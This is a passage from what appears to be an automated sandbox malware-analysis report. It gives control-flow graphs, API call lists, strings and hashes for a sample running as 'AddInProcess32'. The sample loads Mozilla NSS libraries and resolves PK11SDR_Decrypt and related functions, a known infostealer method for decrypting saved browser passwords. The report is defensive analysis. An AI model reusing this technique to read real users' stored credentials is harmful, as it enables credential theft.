                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040B732
                                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 0040B73D
                                                                                      • LoadLibraryW.KERNEL32(00000001), ref: 0040B748
                                                                                      • LoadLibraryW.KERNEL32(0040A423), ref: 0040B753
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0040B863
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$Path$Templstrcat$Directory$Current$ExistsFile$Sleep
                                                                                      • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$freebl3.dll$mozglue.dll$msvcp$msvcp120.dll$msvcp140.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll$vcruntime140.dll
                                                                                      • API String ID: 493290508-559595348
                                                                                      • Opcode ID: d4513ee1e55c7f53e28aeb3fe685bf6bbc67953c352ad936e9f0486468c4f3fb
                                                                                      • Instruction ID: fcc66fec15bbb64430b7f7c13c7c1a41d732b0910be60b97ef59ae4b78ed66bd
                                                                                      • Opcode Fuzzy Hash: d4513ee1e55c7f53e28aeb3fe685bf6bbc67953c352ad936e9f0486468c4f3fb
                                                                                      • Instruction Fuzzy Hash: 40123D71900218AACB10EFA1DC85EDE7BB9EF54314F14407BE909AB1D1DF789A84CF99

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 196 6cd1dd89-6cd1dde7 call 6cd1cc25 199 6cd1ddf0-6cd1ddf2 196->199 200 6cd1dde9-6cd1ddeb 196->200 202 6cd1e1f4-6cd1e1f7 199->202 203 6cd1ddf8-6cd1de0d call 6cd1e388 199->203 201 6cd1e2e1-6cd1e2f1 call 6cd4e4d7 200->201 204 6cd1e1f9-6cd1e219 call 6cd1cb23 NSSUTIL_Quote 202->204 205 6cd1e268-6cd1e26a 202->205 215 6cd1de13-6cd1de33 203->215 216 6cd1e1aa-6cd1e1bc call 6cd1d656 203->216 209 6cd1e270-6cd1e272 204->209 218 6cd1e21b-6cd1e22f call 6cd1dd03 call 6cd1ca25 204->218 205->209 213 6cd1e274-6cd1e27a call 6cd1ca25 209->213 214 6cd1e27b-6cd1e283 209->214 213->214 221 6cd1e285-6cd1e28b call 6cd1ca25 214->221 222 6cd1e28c-6cd1e294 214->222 217 6cd1de3d-6cd1de55 fgets 215->217 216->202 235 6cd1e1be-6cd1e1cb _NSSUTIL_Access 216->235 223 6cd1e0a1-6cd1e0a3 217->223 224 6cd1de5b-6cd1de61 217->224 218->214 266 6cd1e231-6cd1e240 call 6cd1dd03 218->266 221->222 229 6cd1e296-6cd1e298 222->229 230 6cd1e29a-6cd1e2a5 call 6cd1e359 222->230 237 6cd1e0a5-6cd1e0ac 223->237 238 6cd1e0e8-6cd1e0f6 223->238 233 6cd1de64-6cd1de69 224->233 229->230 231 6cd1e2a6-6cd1e2ae 229->231 230->231 241 6cd1e2b0-6cd1e2b8 fclose 231->241 242 6cd1e2ba-6cd1e2bc 231->242 233->233 240 6cd1de6b-6cd1de6d 233->240 246 6cd1e1ed-6cd1e1f3 PR_smprintf_free 235->246 247 6cd1e1cd-6cd1e1e5 PR_smprintf_free call 6cd1cc63 call 6cd1cb04 235->247 248 6cd1e0d9-6cd1e0e2 call 6cd1ca25 237->248 249 6cd1e0ae-6cd1e0c0 call 6cd1dd26 237->249 244 6cd1e133 238->244 245 6cd1e0f8-6cd1e111 PORT_Realloc_Util 238->245 251 6cd1de8d-6cd1de95 240->251 252 6cd1de6f-6cd1de77 240->252 253 6cd1e2df 241->253 242->253 254 6cd1e2be-6cd1e2c1 242->254 258 6cd1e139-6cd1e140 244->258 245->209 257 6cd1e117-6cd1e131 245->257 246->202 247->246 248->238 249->214 272 6cd1e0c6-6cd1e0d3 call 6cd1dd03 249->272 264 6cd1e167-6cd1e17f feof 251->264 265 6cd1de9b-6cd1de9d 251->265 252->251 261 6cd1de79-6cd1de80 252->261 253->201 254->253 262 6cd1e2c3-6cd1e2dc call 6cd1d78e 254->262 257->258 267 6cd1e142-6cd1e144 258->267 268 6cd1e146-6cd1e153 258->268 273 6cd1e2f2-6cd1e2f7 call 6cd4e3fb 261->273 274 6cd1de86 261->274 262->253 270 6cd1e181-6cd1e18d 264->270 271 6cd1e192-6cd1e194 264->271 276 6cd1e090-6cd1e092 265->276 277 6cd1dea3-6cd1deb7 strchr 265->277 266->214 297 6cd1e242-6cd1e251 call 6cd1dd03 266->297 279 6cd1e159-6cd1e161 267->279 268->279 270->217 281 6cd1e196-6cd1e19c call 6cd1ca25 271->281 282 6cd1e19d-6cd1e1a8 271->282 272->214 272->248 274->251 276->264 287 6cd1e098-6cd1e09b 276->287 285 6cd1dfeb-6cd1dfed 277->285 286 6cd1debd-6cd1deca 277->286 279->264 281->282 282->202 294 6cd1e009-6cd1e018 call 6cd1dd03 285->294 295 6cd1dfef-6cd1e003 call 6cd1dd26 285->295 286->285 296 6cd1ded0-6cd1ded2 286->296 287->223 287->264 310 6cd1e01a-6cd1e01c 294->310 295->214 295->294 300 6cd1ded4-6cd1ded6 296->300 301 6cd1df38-6cd1df50 call 6cd201b0 296->301 297->214 311 6cd1e253-6cd1e262 call 6cd1dd03 297->311 308 6cd1def2-6cd1df05 call 6cd1dd03 300->308 309 6cd1ded8-6cd1deec call 6cd1dd26 300->309 318 6cd1df82-6cd1df84 301->318 319 6cd1df52-6cd1df5a 301->319 308->214 323 6cd1df0b-6cd1df23 call 6cd201b0 308->323 309->214 309->308 310->214 315 6cd1e022-6cd1e03a call 6cd201b0 310->315 311->214 329 6cd1e264-6cd1e266 311->329 315->264 335 6cd1e040-6cd1e055 strstr 315->335 325 6cd1dfa0-6cd1dfb8 call 6cd1dd26 318->325 326 6cd1df86-6cd1df9a call 6cd1dd26 318->326 319->264 324 6cd1df60-6cd1df77 NSSUTIL_Quote 319->324 323->315 339 6cd1df29-6cd1df33 323->339 324->209 331 6cd1df7d 324->331 325->214 337 6cd1dfbe-6cd1dfd1 NSSUTIL_Quote 325->337 326->214 326->325 329->205 331->264 335->264 338 6cd1e05b-6cd1e06d 335->338 337->209 340 6cd1dfd7-6cd1dfe9 call 6cd1dd03 call 6cd1ca25 337->340 341 6cd1e076-6cd1e08b NSSUTIL_Quote 338->341 342 6cd1e06f-6cd1e075 call 6cd1ca25 338->342 339->315 340->310 341->264 342->341
                                                                                      APIs
                                                                                      • PORT_ZAlloc_Util.NSS3(00000028,00000000,00000000), ref: 6CD1DDDD
                                                                                        • Part of subcall function 6CD1CC25: PR_Calloc.NSS3(00000001,00000001,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC41
                                                                                        • Part of subcall function 6CD1CC25: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC56
                                                                                      • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000800,00000000,00000000,00000000), ref: 6CD1DE4A
                                                                                      • strchr.VCRUNTIME140(?,0000003D), ref: 6CD1DEAC
                                                                                      • PL_strncasecmp.NSS3(?,parameters,0000000A), ref: 6CD1DF19
                                                                                      • PL_strncasecmp.NSS3(?,NSS=,00000004), ref: 6CD1E030
                                                                                      Strings
                                                                                      • internal, xrefs: 6CD1E046
                                                                                      • slotFlags=[ECC,RSA,DSA,DH,RC2,RC4,DES,RANDOM,SHA1,MD5,MD2,SSL,TLS,AES,Camellia,SEED,SHA256,SHA512], xrefs: 6CD1E242
                                                                                      • NSS=, xrefs: 6CD1E02A
                                                                                      • library= name="NSS Internal PKCS #11 Module" parameters=, xrefs: 6CD1E1F9
                                                                                      • parameters=, xrefs: 6CD1E0B0
                                                                                      • parameters, xrefs: 6CD1DF13, 6CD1DF40
                                                                                      • NSS="Flags=internal,critical trustOrder=75 cipherOrder=100 slotParams=(1={, xrefs: 6CD1E231
                                                                                      • askpw=any timeout=30})", xrefs: 6CD1E253
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: L_strncasecmp$Alloc_CallocErrorUtilfgetsstrchr
                                                                                      • String ID: NSS="Flags=internal,critical trustOrder=75 cipherOrder=100 slotParams=(1={$ askpw=any timeout=30})"$ parameters=$NSS=$internal$library= name="NSS Internal PKCS #11 Module" parameters=$parameters$slotFlags=[ECC,RSA,DSA,DH,RC2,RC4,DES,RANDOM,SHA1,MD5,MD2,SSL,TLS,AES,Camellia,SEED,SHA256,SHA512]
                                                                                      • API String ID: 1573622668-641750848
                                                                                      • Opcode ID: 26b657efe460c6ecbf9173bb36e486609a8af36e823495e83623d7527a3d5775
                                                                                      • Instruction ID: fe4cf810d202044c1a9368f2ddd398f3a2bb2b337b1f3f78f506492d4326c5ec
                                                                                      • Opcode Fuzzy Hash: 26b657efe460c6ecbf9173bb36e486609a8af36e823495e83623d7527a3d5775
                                                                                      • Instruction Fuzzy Hash: 54D1DD71D0D325DBEB119F64BC44BDA73F8BF05718F1481A5E944A6E60EF718A848BD0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 349 6ccee254-6ccee26f 350 6ccee27d-6ccee291 PR_CallOnce 349->350 351 6ccee271-6ccee277 349->351 353 6ccee29b-6ccee2a8 PR_Lock 350->353 354 6ccee293-6ccee296 350->354 351->350 352 6ccee3b3-6ccee3b8 351->352 355 6ccee2bd-6ccee2cf NSS_IsInitialized 353->355 354->352 356 6ccee2aa-6ccee2ac 355->356 357 6ccee2d1-6ccee2e6 PR_Unlock 355->357 356->357 360 6ccee2ae-6ccee2bc PR_WaitCondVar 356->360 358 6ccee2e8-6ccee2ef call 6ccdeebe 357->358 359 6ccee303-6ccee306 357->359 367 6ccee354-6ccee356 358->367 368 6ccee2f1-6ccee2f8 call 6cce0d96 358->368 362 6ccee308-6ccee30b 359->362 363 6ccee312-6ccee320 call 6cd03576 359->363 360->355 362->363 365 6ccee30d-6ccee310 362->365 369 6ccee323-6ccee325 363->369 365->363 365->369 374 6ccee358-6ccee35b 367->374 375 6ccee374-6ccee3a6 PR_Lock PR_NotifyCondVar PR_Unlock 367->375 368->367 387 6ccee2fa-6ccee301 call 6cce7b8c 368->387 371 6ccee40b-6ccee417 369->371 372 6ccee32b-6ccee337 call 6cd1cc25 369->372 376 6ccee41d-6ccee422 371->376 372->367 392 6ccee339-6ccee33e 372->392 374->375 381 6ccee35d-6ccee36a call 6cd1ca25 374->381 377 6ccee3af 375->377 378 6ccee3a8-6ccee3ae call 6cd14161 375->378 382 6ccee424-6ccee428 376->382 383 6ccee430-6ccee463 call 6ccee5c6 376->383 386 6ccee3b2 377->386 378->377 381->375 400 6ccee36c-6ccee373 PR_smprintf_free 381->400 382->383 389 6ccee42a-6ccee42e 382->389 396 6ccee468-6ccee470 383->396 386->352 387->359 387->367 389->383 395 6ccee476-6ccee47a 389->395 397 6ccee3f8-6ccee409 call 6cd146cb 392->397 398 6ccee344-6ccee347 392->398 403 6ccee54b-6ccee55a PR_Lock 395->403 404 6ccee480-6ccee487 call 6cd1c1c6 395->404 396->367 396->395 397->376 401 6ccee3b9-6ccee3e0 call 6ccee876 398->401 402 6ccee349 398->402 400->375 417 6ccee3ec-6ccee3f5 401->417 418 6ccee3e2-6ccee3e7 401->418 406 6ccee34e-6ccee353 call 6cd1cb04 402->406 409 6ccee55c-6ccee566 403->409 410 6ccee568-6ccee57c 403->410 404->367 419 6ccee48d-6ccee494 call 6ccf45fb 404->419 406->367 415 6ccee581-6ccee5a3 PR_NotifyAllCondVar PR_Unlock 409->415 410->415 420 6ccee5a5-6ccee5a7 415->420 421 6ccee5b1-6ccee5b6 415->421 417->397 418->406 419->367 429 6ccee49a-6ccee4a1 call 6ccee81f 419->429 420->421 423 6ccee5a9-6ccee5b0 PR_smprintf_free 420->423 424 6ccee5bf-6ccee5c1 421->424 425 6ccee5b8-6ccee5be call 6cd14161 421->425 423->421 424->386 425->424 429->367 432 6ccee4a7-6ccee4b7 call 6ccf4405 call 6ccde50f 429->432 437 6ccee4bd-6ccee4c1 432->437 438 6ccee541-6ccee546 call 6cd0e752 call 6ccdeb83 432->438 437->438 440 6ccee4c3-6ccee4c7 437->440 438->403 440->438 442 6ccee4c9-6ccee4d0 call 6cd136f3 440->442 442->438 446 6ccee4d2-6ccee4e5 strncmp 442->446 447 6ccee4fc-6ccee4ff 446->447 448 6ccee4e7-6ccee4fa strncmp 446->448 450 6ccee532-6ccee534 447->450 448->447 449 6ccee501-6ccee514 strncmp 448->449 452 6ccee51b-6ccee530 strncmp 449->452 453 6ccee516-6ccee519 449->453 450->438 451 6ccee536-6ccee53a call 6ccee09d 450->451 455 6ccee53f-6ccee540 451->455 452->450 453->450 455->438
                                                                                      APIs
                                                                                      • PR_CallOnce.NSS3(6CD89340,6CCEEAFC), ref: 6CCEE287
                                                                                      • PR_Lock.NSS3 ref: 6CCEE2A2
                                                                                      • PR_WaitCondVar.NSS3(000000FF), ref: 6CCEE2B6
                                                                                      • NSS_IsInitialized.NSS3 ref: 6CCEE2BE
                                                                                      • PR_Unlock.NSS3 ref: 6CCEE2DD
                                                                                      • PORT_ZAlloc_Util.NSS3(00000008), ref: 6CCEE32D
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013), ref: 6CCEE34E
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CCEE35F
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE36D
                                                                                      • PR_Lock.NSS3 ref: 6CCEE37A
                                                                                      • PR_NotifyCondVar.NSS3 ref: 6CCEE38C
                                                                                      • PR_Unlock.NSS3 ref: 6CCEE398
                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6CCEE3A9
                                                                                      • SECOID_Init.NSS3 ref: 6CCEE480
                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CCEE4DA
                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CCEE4EF
                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CCEE509
                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CCEE523
                                                                                      • PR_Lock.NSS3 ref: 6CCEE551
                                                                                      • PR_NotifyAllCondVar.NSS3 ref: 6CCEE58D
                                                                                      • PR_Unlock.NSS3 ref: 6CCEE599
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE5AA
                                                                                      • SECMOD_DestroyModule.NSS3(1413A91C), ref: 6CCEE5B9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: strncmp$CondLockUnlockUtil$DestroyModuleNotifyR_smprintf_free$Alloc_CallError_Free_InitInitializedOnceWait
                                                                                      • String ID: dbm:$extern:$rdb:$sql:
                                                                                      • API String ID: 566716733-2860810037
                                                                                      • Opcode ID: 7954c918d90fd8c2aa6cc007ee60b0e0a58193c22413a28d3836a8fe5f7bbd51
                                                                                      • Instruction ID: 2ccfb9eac2ad1c8eb989e48b909c6caa76115156cca24b9be3cf1ce736c58aa4
                                                                                      • Opcode Fuzzy Hash: 7954c918d90fd8c2aa6cc007ee60b0e0a58193c22413a28d3836a8fe5f7bbd51
                                                                                      • Instruction Fuzzy Hash: 41A1C132606201EFEF119FA5DD44A9A77B9BF0F398F18421DFA1192AA0FB31D414DB91

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0040AE1A
                                                                                        • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,759801C0,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00403769
                                                                                        • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                                                                      • PathFileExistsW.SHLWAPI(00409EC5,?,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?), ref: 0040AF08
                                                                                      • PathFileExistsW.SHLWAPI(00409EC5,0000005A,.dll,?,00409EC5), ref: 0040AF64
                                                                                      • LoadLibraryW.KERNEL32(?,00409EC5), ref: 0040AFA3
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040AFAE
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040AFB9
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040AFC4
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040AFCF
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0040B0BC
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                                                                      • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                                                                      • API String ID: 410702425-850564384
                                                                                      • Opcode ID: 9b40ae26be8b39f8e4cf9d274af463f8debfac5805ea49a486838a2b0e960762
                                                                                      • Instruction ID: adf04343739510be93e0c3051fa592f7aed2d6a863cdebd9eec2d50d860fb44a
                                                                                      • Opcode Fuzzy Hash: 9b40ae26be8b39f8e4cf9d274af463f8debfac5805ea49a486838a2b0e960762
                                                                                      • Instruction Fuzzy Hash: F3910C71A00609ABCB04EFA1DC92AEEBB79AF54304F10413FE515771E1DF38AA55CB98

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 559 6cd048cc-6cd048f8 560 6cd04901-6cd04904 559->560 561 6cd048fa-6cd048fc 559->561 563 6cd04995-6cd04998 560->563 564 6cd0490a-6cd0490d 560->564 562 6cd04af7-6cd04b07 call 6cd4e4d7 561->562 567 6cd0499e-6cd049b2 PR_LoadLibrary 563->567 568 6cd04af4 563->568 566 6cd04913-6cd04919 564->566 564->567 570 6cd04935-6cd04945 566->570 571 6cd0491b-6cd0492f PR_CallOnce 566->571 567->568 572 6cd049b8-6cd049bb 567->572 568->562 573 6cd04947-6cd0494c 570->573 574 6cd0494e 570->574 571->568 571->570 575 6cd049cd-6cd049d1 572->575 576 6cd049bd-6cd049cb PR_FindSymbol 572->576 577 6cd04953-6cd04961 PR_FindSymbol 573->577 574->577 578 6cd049d3-6cd049e1 PR_FindSymbol 575->578 579 6cd049e4-6cd049e8 575->579 576->575 577->568 582 6cd04967-6cd0496b 577->582 578->579 580 6cd049ea 579->580 581 6cd049ee-6cd049f0 579->581 580->581 583 6cd049f2-6cd049f5 581->583 584 6cd04a0b-6cd04a14 581->584 585 6cd0496d-6cd0497c PR_FindSymbol 582->585 586 6cd0497f-6cd04983 582->586 587 6cd04a05-6cd04a06 583->587 588 6cd049f7-6cd049fd 583->588 592 6cd04ad0-6cd04ae6 PR_GetEnvSecure 584->592 593 6cd04a1a-6cd04a30 PR_GetEnvSecure 584->593 585->586 586->584 589 6cd04989-6cd04990 586->589 590 6cd04aed-6cd04af3 PR_UnloadLibrary 587->590 588->587 589->561 590->568 592->568 594 6cd04ae8-6cd04aea 592->594 595 6cd04a32 593->595 596 6cd04a67-6cd04a7c call 6cd04c38 593->596 594->568 598 6cd04aec 594->598 599 6cd04a35-6cd04a39 595->599 596->592 604 6cd04a7e-6cd04a82 596->604 598->590 601 6cd04a55-6cd04a57 599->601 602 6cd04a3b-6cd04a3d 599->602 603 6cd04a59-6cd04a5b 601->603 605 6cd04a51-6cd04a53 602->605 606 6cd04a3f-6cd04a45 602->606 603->596 607 6cd04a5d-6cd04a65 call 6cd0326d 603->607 608 6cd04a84 604->608 609 6cd04a8c-6cd04a96 604->609 605->603 606->601 610 6cd04a47-6cd04a4f 606->610 607->596 608->609 614 6cd04a98-6cd04a9e 609->614 615 6cd04ab9-6cd04ac0 609->615 610->599 610->605 614->615 616 6cd04aa0-6cd04aa3 614->616 617 6cd04ac2-6cd04ac6 615->617 618 6cd04ac8-6cd04acf 615->618 619 6cd04aa5-6cd04aac 616->619 620 6cd04b0c-6cd04b15 616->620 617->592 617->618 618->592 621 6cd04b08 619->621 622 6cd04aae-6cd04ab3 call 6cd1cb04 619->622 623 6cd04b17-6cd04b1a 620->623 624 6cd04b1c-6cd04b33 call 6cd13033 620->624 621->620 629 6cd04ab8 622->629 623->624 627 6cd04b35-6cd04b47 623->627 624->615 624->627 632 6cd04c22-6cd04c2e 627->632 633 6cd04b4d-6cd04b62 call 6cd1c6c7 627->633 629->615 633->615 636 6cd04b68-6cd04b7c call 6cd1c68c 633->636 636->615 639 6cd04b82-6cd04b93 636->639 641 6cd04ba0-6cd04baa 639->641 642 6cd04b95-6cd04b9b call 6cd1ca25 639->642 644 6cd04c11-6cd04c21 call 6cd1ca25 641->644 645 6cd04bac-6cd04bc2 call 6cd130e9 call 6cd12973 641->645 642->629 644->632 652 6cd04bc7-6cd04bef call 6cd12f97 call 6cd0209e call 6cd0b88d 645->652 659 6cd04bf1-6cd04bfb 652->659 660 6cd04c09-6cd04c0f 652->660 659->660 661 6cd04bfd-6cd04c08 call 6cd13a2e 659->661 660->644 660->645 661->660
                                                                                      APIs
                                                                                      • PR_CallOnce.NSS3(6CD893A4,6CD04EF5,00000000,00000000,00000000), ref: 6CD04925
                                                                                      • PR_FindSymbol.NSS3(NSC_GetFunctionList,00000000,00000000,00000000), ref: 6CD04959
                                                                                      • PR_FindSymbol.NSS3(NSC_ModuleDBFunc), ref: 6CD04978
                                                                                      • PR_LoadLibrary.NSS3(?,00000000,00000000,00000000), ref: 6CD049A1
                                                                                      • PR_FindSymbol.NSS3(00000000,C_GetFunctionList), ref: 6CD049C3
                                                                                      • PR_FindSymbol.NSS3(00000000,NSS_ReturnModuleSpecData), ref: 6CD049D9
                                                                                      • PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6CD04AD8
                                                                                      • PR_UnloadLibrary.NSS3(?), ref: 6CD04AED
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,?), ref: 6CD04B56
                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6CD04B6F
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CD04B96
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CD04C19
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindSymbolUtil$Alloc_Free_Library$ArenaCallLoadOnceSecureUnload
                                                                                      • String ID: C_GetFunctionList$FC_GetFunctionList$NSC_GetFunctionList$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_ReturnModuleSpecData
                                                                                      • API String ID: 1592131494-2608117499
                                                                                      • Opcode ID: 3f459d6427414e114032284bd195b463a8c7b674f252d1376f7076629fafb117
                                                                                      • Instruction ID: c9d825c00d322b6ae7a4a2bae435643b422fbf7c293be4ccf67441c0f10d4ecb
                                                                                      • Opcode Fuzzy Hash: 3f459d6427414e114032284bd195b463a8c7b674f252d1376f7076629fafb117
                                                                                      • Instruction Fuzzy Hash: 28B18A32A05701DFEB208FAED885F5AB7F8AF1531CF14052EE15696E60EB71E444CB24

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PR_Init.NSS3(?,00000000), ref: 6CCCC726
                                                                                      • PR_EnterMonitor.NSS3(?,00000000), ref: 6CCCC731
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000), ref: 6CCCC75E
                                                                                      • PR_Malloc.NSS3(00000000), ref: 6CCCC774
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 6CCCC79F
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CCCC7BA
                                                                                      • PR_Malloc.NSS3(00000000), ref: 6CCCC7CE
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 6CCCC80B
                                                                                      • PR_Calloc.NSS3(00000001,00000014), ref: 6CCCC82A
                                                                                      • GetLastError.KERNEL32 ref: 6CCCC837
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 6CCCC857
                                                                                      • GetLastError.KERNEL32 ref: 6CCCC863
                                                                                      • strdup.MOZGLUE(?), ref: 6CCCC87B
                                                                                      • PR_LogPrint.NSS3(Loaded library %s (load lib),00000000), ref: 6CCCC8B1
                                                                                        • Part of subcall function 6CCC78D9: PR_Init.NSS3(00000000), ref: 6CCC78F7
                                                                                        • Part of subcall function 6CCC78D9: PR_Now.NSS3(?,?,00000001,00000000,00000000), ref: 6CCC7923
                                                                                        • Part of subcall function 6CCC78D9: PR_ExplodeTime.NSS3(00000000,?,?,?,00000001,00000000,00000000), ref: 6CCC792A
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?,00000000,?,?,?,00000001,00000000), ref: 6CCC796A
                                                                                        • Part of subcall function 6CCC78D9: PR_GetCurrentThread.NSS3(00000001,00000000,00000000), ref: 6CCC7974
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC799C
                                                                                        • Part of subcall function 6CCC78D9: PR_vsnprintf.NSS3(?,000001FF,?,6CCC77F9,?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC79BC
                                                                                        • Part of subcall function 6CCC78D9: PR_vsmprintf.NSS3(?,6CCC77F9,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC79DA
                                                                                        • Part of subcall function 6CCC78D9: EnterCriticalSection.KERNEL32(05203804,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A02
                                                                                      • GetLastError.KERNEL32 ref: 6CCCC8C0
                                                                                      • PR_SetError.NSS3(FFFFE8A7,00000000), ref: 6CCCC8D2
                                                                                      • PR_ExitMonitor.NSS3 ref: 6CCCC908
                                                                                      Strings
                                                                                      • Loaded library %s (load lib), xrefs: 6CCCC8AC
                                                                                      Memory Dump Source
